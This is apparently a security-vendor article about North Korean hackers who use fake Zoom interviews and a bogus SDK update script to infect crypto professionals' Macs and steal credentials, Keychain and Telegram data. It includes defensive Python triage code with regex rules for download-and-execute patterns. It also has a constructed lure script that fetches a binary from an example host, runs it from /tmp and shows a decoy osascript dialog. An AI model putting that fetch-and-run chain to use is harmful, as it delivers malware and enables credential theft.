How North Korean Hackers Are Using Zoom to Infiltrate Crypto Startups
North Korean threat actors have launched a cyberattack campaign against cryptocurrency companies that uses fake Zoom meeting invitations to breach their systems. This wave of social engineering targets Web3 and blockchain firms by staging job interviews and delivering malware under cover of those interactions.
At the center of the campaign is a social engineering tactic designed to build trust. Hackers pose as recruiters offering enticing job opportunities. Once victims are engaged, they are invited to attend fake interviews conducted via Zoom. These invitations come with instructions to install a bogus “Zoom SDK update script.” Zoom’s SDKs are developer kits; a meeting participant never needs to run an SDK update to join a call, so any such request is itself a red flag. In reality, the script delivers the malware payload to the victim’s system.
A Familiar Strategy with Dangerous Upgrades
This strategy reflects known North Korean cyber operations but has evolved significantly. The campaign has reportedly been active for over a year and focuses specifically on professionals working within the crypto space.
Security researchers have documented technical changes in the malware. Unlike past variants, the latest versions are built from components in several programming languages, which complicates analysis and reduces the coverage of signature-based detections.
How the Attack Chain Works
The campaign combines several tactics into a single attack chain:
- Victims are contacted via email or messaging platforms under the pretense of a job offer.
- After establishing rapport, the attacker schedules a Zoom call.
- The victim receives a link and instructions to install a fake Zoom “update” script, which actually launches the malware.
- Once executed, the payload runs on macOS as a mix of AppleScript, C++ components, and binaries compiled with Nim.
This combination of languages produces a modular malware architecture that is harder to analyze. Each component has a role: AppleScript drives native macOS functionality, C++ handles core operations, and the Nim-compiled binaries are less likely to match signatures written for more common malware toolchains.
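The fetch-and-run shape of the lure script in the chain above (a remote download written to disk, made executable, launched from a temporary directory, with AppleScript driven through osascript) is something a defender can triage before anything runs. The following is an added example, not code from the original article or from the researchers who analyzed the campaign. The rule set, thresholds and both sample scripts are the editor’s constructions; the domain in the lure sample is a reserved example name, not an indicator from the campaign.

```python
import re

# Editor-supplied heuristics for triaging a downloaded "update script" of the
# kind described above. The rule set is an assumption for illustration, not an
# indicator list from the campaign report.
RULES = {
    # AppleScript driven from a shell script (osascript is the macOS runner)
    "applescript_exec": re.compile(r"\bosascript\b"),
    # Remote fetch written to disk (curl/wget with an output path)
    "download_to_disk": re.compile(r"\b(curl|wget)\b[^\n|]*\s(-o|-O|--output)\s"),
    # Remote fetch piped straight into a shell
    "download_pipe_shell": re.compile(r"\b(curl|wget)\b[^\n]*\|\s*(ba|z|k)?sh\b"),
    # Dropped file made executable
    "mark_executable": re.compile(r"\bchmod\s+(\+x|[0-7]*7[0-7]*)\s"),
    # A binary launched from a temporary directory (optionally via nohup/exec/sh)
    "exec_from_temp": re.compile(
        r"^\s*(nohup\s+|exec\s+|(ba|z)?sh\s+)?"
        r"(/tmp|/var/tmp|/private/tmp|\$TMPDIR|\$\{TMPDIR\})/\S+",
        re.MULTILINE),
    # Payload staged as base64 text and decoded on the host
    "decode_payload": re.compile(r"\bbase64\b[^\n]*(\s-[dD]\b|--decode)"),
    # Persistence through a LaunchAgent (general macOS heuristic, not from the report)
    "launch_agent": re.compile(r"\blaunchctl\s+(load|bootstrap)\b|/Library/LaunchAgents/"),
}

STAGING = {"download_to_disk", "download_pipe_shell", "decode_payload"}
EXECUTION = {"mark_executable", "exec_from_temp", "applescript_exec", "launch_agent"}


def triage_script(text: str) -> list[str]:
    """Return the names of all rules that match the script text, in rule order."""
    return [name for name, rx in RULES.items() if rx.search(text)]


def verdict(hits: list[str]) -> str:
    """Staging plus execution is the fetch-and-run shape of the lure.

    Either side alone (a bare curl, or a dialog shown via osascript) is weaker
    evidence and is reported as suspicious rather than malicious.
    """
    found = set(hits)
    if found & STAGING and found & EXECUTION:
        return "malicious-pattern"
    if found & (STAGING | EXECUTION):
        return "suspicious"
    return "clean"


# Constructed samples (not real artefacts; the domain is a reserved example name).
BENIGN_SCRIPT = """#!/bin/bash
# Print the installed Zoom client version
defaults read /Applications/zoom.us.app/Contents/Info.plist CFBundleShortVersionString
"""

LURE_SCRIPT = """#!/bin/bash
# "Zoom SDK update"
curl -fsSL https://sdk-update.example.invalid/update -o /tmp/zoom_sdk_update
chmod +x /tmp/zoom_sdk_update
nohup /tmp/zoom_sdk_update >/dev/null 2>&1 &
osascript -e 'display dialog "Zoom SDK is up to date" buttons {"OK"}'
"""

if __name__ == "__main__":
    for label, script in (("benign", BENIGN_SCRIPT), ("lure", LURE_SCRIPT)):
        hits = triage_script(script)
        print(f"{label}: {verdict(hits)} {hits}")
```

The verdict deliberately requires both a staging rule and an execution rule to fire: an internal tooling script that only downloads a file, or an installer that only shows an osascript dialog, comes back as suspicious for a human to look at, while the lure pattern (download, chmod, launch from /tmp, osascript) is flagged outright.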
Why Nim Matters in This Campaign
One of the standout features of this operation is the use of the Nim programming language. Nim is relatively obscure, compiles (through a C backend) to small native executables, and is rarely seen in malware compared with languages such as Python or C#. The source syntax itself is irrelevant once the code is compiled; what matters is that Nim’s runtime, code patterns and library strings are poorly covered by existing antivirus signatures and unfamiliar to many analysts.
By using Nim, the malware is less recognizable and slower to reverse-engineer. That introduces blind spots in automated security scanners and buys the attackers time before they are detected.
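The point made here and in the attack-chain section above is that signatures written for one toolchain miss another. A cheap first step in triage is therefore to ask which toolchains produced an unknown binary before deciding which tools to analyze it with. The following is an added example, not code from the original article or from the researchers’ report. The marker lists and thresholds are the editor’s assumptions: they hold for default, unstripped builds (Nim keeps runtime and module-name strings for stack traces; C++ binaries carry the Itanium ABI symbols; compiled AppleScript starts with the FasdUAS magic), and a stripped or packed binary can shed most of them. The sample blobs stand in for a strings dump and are constructed, not captured.

```python
from pathlib import Path

# Editor-supplied byte markers for the three languages named in the article.
# The lists are an assumption for illustration: they hold for default
# (unstripped) builds, and a stripped or packed binary can shed most of them.
MARKERS = {
    "nim": [
        b"NimMain",                 # entry point generated by the Nim compiler
        b"nimFrame",                # stack-trace frame helpers in the Nim runtime
        b"popFrame",
        b"nimErrorFlag",            # error-propagation helper (goto exceptions)
        b"system.nim",              # standard-library module names kept for traces
        b"fatal.nim",
        b"Illegal storage access",  # Nim's SIGSEGV message
    ],
    "cpp": [
        b"__cxa_throw",             # C++ runtime exception ABI
        b"__cxa_begin_catch",
        b"_ZN",                     # Itanium-mangled C++ symbol prefix
        b"std::",
        b"libc++",
    ],
    "applescript": [
        b"FasdUAS",                 # magic of a compiled AppleScript (.scpt)
        b"osascript",               # shelling out to the AppleScript runner
        b"NSAppleScript",           # Foundation class that runs AppleScript in-process
    ],
}

# Minimum distinct markers before a language is reported: one generic C++ or Nim
# string is too weak on its own; one AppleScript magic or runner name is enough.
MIN_HITS = {"nim": 2, "cpp": 2, "applescript": 1}


def fingerprint(data: bytes) -> dict[str, list[str]]:
    """Return {language: [markers found]} for every language over its threshold.

    A multi-language payload like the one described in the article shows up as
    more than one key, which is itself a useful triage signal.
    """
    found = {}
    for lang, markers in MARKERS.items():
        hits = [m.decode() for m in markers if m in data]
        if len(hits) >= MIN_HITS[lang]:
            found[lang] = hits
    return found


def fingerprint_file(path: str) -> dict[str, list[str]]:
    """Convenience wrapper: fingerprint a file on disk."""
    return fingerprint(Path(path).read_bytes())


# Constructed samples standing in for a strings dump of each artefact type.
# The leading bytes are the 64-bit Mach-O magic as it appears on disk.
NIM_SAMPLE = (b"\xcf\xfa\xed\xfe" + b"\x00" * 16
              + b"NimMain\x00nimFrame\x00popFrame\x00system.nim\x00fatal.nim\x00")
CPP_SAMPLE = (b"\xcf\xfa\xed\xfe"
              + b"__cxa_throw\x00_ZNSt3__112basic_stringIcE\x00std::bad_alloc\x00")
APPLESCRIPT_SAMPLE = b"FasdUAS 1.101.10\x0e\x00\x00\x04\x0f\xff\xff\x00\x01\x00\x02"
PLAIN_SAMPLE = b"quarterly report, nothing to see here\n"

if __name__ == "__main__":
    samples = (("nim", NIM_SAMPLE), ("cpp", CPP_SAMPLE),
               ("applescript", APPLESCRIPT_SAMPLE), ("plain", PLAIN_SAMPLE),
               ("mixed", NIM_SAMPLE + CPP_SAMPLE))
    for name, blob in samples:
        print(name, fingerprint(blob))
```

In practice you would run `fingerprint_file` over everything a suspicious script dropped and route Nim hits to a Nim-aware decompiler workflow rather than assuming the usual C/C++ toolchain; an empty result on a binary that clearly does something is also informative, since it suggests stripping or packing.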
What the Malware Steals
Once deployed, the malware maintains a persistent command channel over secure WebSockets (wss://, that is, WebSocket over TLS). This lets the operators issue commands in real time and exfiltrate sensitive data inside encrypted traffic that looks like ordinary HTTPS, so it rarely raises alarms.
The primary targets include:
- Stored credentials and cookies from browsers such as Chrome, Brave, Edge, Firefox, and Arc
- macOS Keychain data containing authentication details
- Telegram user data, including encrypted messages and potential two-factor authentication codes
Taken together, this data lets the attackers take over digital wallets, exchange accounts, and communication apps, and with them the victims’ crypto assets.
Real Risks for Crypto Firms and Professionals
The campaign is a clear demonstration of how nation-state actors are adapting to target financial infrastructure tied to cryptocurrencies. The evolving use of uncommon programming languages and real-time exfiltration methods represents a dangerous trend in cyberattacks.
Companies operating in the Web3, DeFi, and blockchain spaces must implement robust cybersecurity measures. This includes secure onboarding processes, endpoint protection, and detection systems capable of analyzing non-traditional codebases.
At ZENDATA, we offer tailored cybersecurity services for blockchain startups and crypto enterprises. From threat detection to endpoint defense and secure architecture design, we help businesses defend against sophisticated adversaries.
Conclusion
This campaign showcases North Korea’s ongoing commitment to exploiting the cryptocurrency ecosystem through technical innovation and psychological manipulation. Organizations must remain vigilant and educate their teams on social engineering red flags, particularly when unsolicited interviews or meeting invitations are involved.
Read the full article at Cybersecurity News here